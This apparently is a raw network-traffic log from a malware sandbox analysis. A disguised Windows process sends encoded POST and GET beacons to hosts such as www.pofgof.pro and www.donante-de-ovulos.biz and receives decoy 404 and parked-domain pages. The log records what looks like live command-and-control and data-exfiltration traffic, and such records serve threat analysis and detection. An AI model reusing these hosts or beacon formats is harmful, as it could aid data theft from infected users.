                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:23.778867006 CEST  240                IN
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                    17          192.168.2.8  63709        209.74.95.29     80                6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp                             Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:18:28.849875927 CEST  716                OUT        POST /gfz9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.pofgof.pro
                                                    Origin: http://www.pofgof.pro
                                                    Referer: http://www.pofgof.pro/gfz9/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=OGqlMbYLd8PJmv4olE7DVbaBFckLTkFtNnT24+Oy7+Ujv8wa1GD3Lh5bW4PsCuqhqBmqanN7JJn5ZKzixm6QHE2aiQsCvh7o/fNcG7JCEfzXTKXhvC7bIhE1LgPRvDadA8VeXyGEGF40LLgcGvHz93QEUBvel3Nszqx1YcWubFfM6J9L4sHLjkY0l+p2TR3oNd9lrpY=
                                                    Sep 24, 2024 17:18:29.444363117 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 24 Sep 2024 15:18:29 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 13928
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                    Sep 24, 2024 17:18:29.444406033 CEST  224                IN
                                                    Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -->
                                                    Sep 24, 2024 17:18:29.444422960 CEST  1236               IN
                                                    Data Ascii: <link href="css/style.css" rel="stylesheet"></head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top
                                                    Sep 24, 2024 17:18:29.444458961 CEST  1236               IN
                                                    Data Ascii: span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto"> <a href="index.html"
                                                    Sep 24, 2024 17:18:29.444477081 CEST  1236               IN
                                                    Data Ascii: <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a> </div> </
                                                    Sep 24, 2024 17:18:29.444495916 CEST  1236               IN
                                                    Data Ascii: ia-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header.jpg" alt=""
                                                    Sep 24, 2024 17:18:29.444514990 CEST  896                IN
                                                    Data Ascii: <option value="3">Property Type 3</option> </select> </div> <div class="col-md-4"> <select class="fo
                                                    Sep 24, 2024 17:18:29.444648981 CEST  1236               IN
                                                    Data Ascii: </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center"> <div cla
                                                    Sep 24, 2024 17:18:29.444825888 CEST  224                IN
                                                    Data Ascii: e mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345
                                                    Sep 24, 2024 17:18:29.444842100 CEST  1236               IN
                                                    Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                    Sep 24, 2024 17:18:29.449450970 CEST  1236               IN
                                                    Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">


                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                    18          192.168.2.8  63710        209.74.95.29     80                6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp                             Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:18:31.402606010 CEST  736                OUT        POST /gfz9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.pofgof.pro
                                                    Origin: http://www.pofgof.pro
                                                    Referer: http://www.pofgof.pro/gfz9/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=OGqlMbYLd8PJnPIopF7DZraGbskLZEFpNnf248jp7Mwjucga0HD3Ih5bYYOkd+quqBjVait7JNP5ZPXiyX6TFU2YvwsThB7o/fNcG7N4EbfXU6Lhsj7YBBE2bAPRrDanA8V8XzbRGHA0LKQcF6r0kHQKQBvMj2cT+bkaVdTJcXP+yfQhiOPNgkwfl9BAWmqAX+tV1+PcY2WSeHkWzvqSGZ6Yw/qK
                                                    Sep 24, 2024 17:18:31.988761902 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 24 Sep 2024 15:18:31 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 13928
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                    Sep 24, 2024 17:18:31.988818884 CEST  1236               IN
                                                    Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                    Sep 24, 2024 17:18:31.988858938 CEST  448                IN
                                                    Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                    Sep 24, 2024 17:18:31.989037991 CEST  1236               IN
                                                    Data Ascii: a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="n
                                                    Sep 24, 2024 17:18:31.989074945 CEST  1236               IN
                                                    Data Ascii: </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Property</a>
                                                    Sep 24, 2024 17:18:31.989106894 CEST  448                IN
                                                    Data Ascii: /header.jpg" alt=""> </div> </div> </div> ... Header End --> ... Search Start --> <div class="container-fluid bg-primary mb-5 wow fadeIn" data-wow-delay="0.1s" style="padd
                                                    Sep 24, 2024 17:18:31.989154100 CEST  1236               IN
                                                    Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                    Sep 24, 2024 17:18:31.989190102 CEST  1236               IN
                                                    Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div>
                                                    Sep 24, 2024 17:18:31.989228964 CEST  1236               IN
                                                    Data Ascii: pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touc
                                                    Sep 24, 2024 17:18:31.989305019 CEST  1236               IN
                                                    Data Ascii: mb-4">Quick Links</h5> <a class="btn btn-link text-white-50" href="">About Us</a> <a class="btn btn-link text-white-50" href="">Contact Us</a> <a class="btn btn-link t
                                                    Sep 24, 2024 17:18:31.994009972 CEST  1236               IN
                                                    Data Ascii: </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-4.jpg" alt=""> </div>


                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                    19          192.168.2.8  63711        209.74.95.29     80                6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp                             Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:18:33.945765018 CEST  1753               OUT        POST /gfz9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.pofgof.pro
                                                    Origin: http://www.pofgof.pro
                                                    Referer: http://www.pofgof.pro/gfz9/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:34.589235067 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 24 Sep 2024 15:18:34 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 13928
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.8 | 63712 | 209.74.95.29 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:36.489972115 CEST | 457 | OUT | GET /gfz9/?VX=XZGx-&L4Ml=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.pofgof.pro
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:37.074016094 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 24 Sep 2024 15:18:36 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 13928
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.8 | 63713 | 199.59.243.227 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:42.218084097 CEST | 749 | OUT | POST /8lrv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donante-de-ovulos.biz
                                                    Origin: http://www.donante-de-ovulos.biz
                                                    Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=u0BgzfkYmwySWB5yRJZ7nABWFhdCANRL/ziTonH8fXPuL6jKgc/ZI4wpuR03bHYt9V5AUitdM/mCDGMKIGvD9udBJkJCZdHDCWWd/FbBcnKjLSFCE9BEZaXzzaRpUduh7VzUNeACels4LClkZ1rHfQjf62F1T8nn2Mk0rj6QIFru3gzH1cLdnBjxaW4zaa5A2viozeU=
                                                    Sep 24, 2024 17:18:42.692819118 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:42 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1150
                                                    x-request-id: d31ea0bf-a018-4941-a381-13c11b3f035a
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                    set-cookie: parking_session=d31ea0bf-a018-4941-a381-13c11b3f035a; expires=Tue, 24 Sep 2024 15:33:42 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.8 | 63714 | 199.59.243.227 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:44.910325050 CEST | 769 | OUT | POST /8lrv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donante-de-ovulos.biz
                                                    Origin: http://www.donante-de-ovulos.biz
                                                    Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=u0BgzfkYmwySXgJyXqx7hgBVJBdCOdRH/z+TokKhcifuLbTKjZDZYowp6h0IGXYm9V01UiRdM/yCDEUKL1XM9+dDc0JMU9HDCWWd/FOscnyjLBdCFcBDaaXskqRpQdub7VzMNfcsenk4LDVkZkrEUQjV1WEeWMOoybk1h1WWJ07t2Wetv+DbkBLaaVQFftkosMyYtJAe9yr/k1LvWllAd74yH7nx
                                                    Sep 24, 2024 17:18:45.236882925 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:44 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1150
                                                    x-request-id: 08e0092c-dd05-4e58-829e-07874d9fdcbe
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                    set-cookie: parking_session=08e0092c-dd05-4e58-829e-07874d9fdcbe; expires=Tue, 24 Sep 2024 15:33:45 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.8 | 63715 | 199.59.243.227 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:47.758857012 CEST | 1786 | OUT | POST /8lrv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donante-de-ovulos.biz
                                                    Origin: http://www.donante-de-ovulos.biz
                                                    Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:48.189950943 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:47 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1150
                                                    x-request-id: e89fc43a-4788-4054-abe0-8bb4ddda83a2
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                    set-cookie: parking_session=e89fc43a-4788-4054-abe0-8bb4ddda83a2; expires=Tue, 24 Sep 2024 15:33:48 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:18:48.190100908 CEST | 603 | IN
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTg5ZmM0M2EtNDc4OC00MDU0LWFiZTAtOGJiNGRkZGE4M2EyIiwicGFnZV90aW1lIjoxNzI3MTkxMT


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.8 | 63716 | 199.59.243.227 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:50.342324972 CEST | 468 | OUT | GET /8lrv/?L4Ml=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.donante-de-ovulos.biz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:50.785259962 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:50 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1498
                                                    x-request-id: 618a107a-4995-4009-8e69-be755bf64bf7
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h0id5wBIO6jf6hefTPTiB/gYDa/EmQZRVFewuFR2ZRN9ujlKrJ5aQKrTTTIQhmskCdMWyDa7NsUdRlMH1IMKlg==
                                                    set-cookie: parking_session=618a107a-4995-4009-8e69-be755bf64bf7; expires=Tue, 24 Sep 2024 15:33:50 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h0id5wBIO6jf6hefTPTiB/gYDa/EmQZRVFewuFR2ZRN9ujlKrJ5aQKrTTTIQhmskCdMWyDa7NsUdRlMH1IMKlg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:18:50.785631895 CEST | 951 | IN
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjE4YTEwN2EtNDk5NS00MDA5LThlNjktYmU3NTViZjY0YmY3IiwicGFnZV90aW1lIjoxNzI3MTkxMT


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
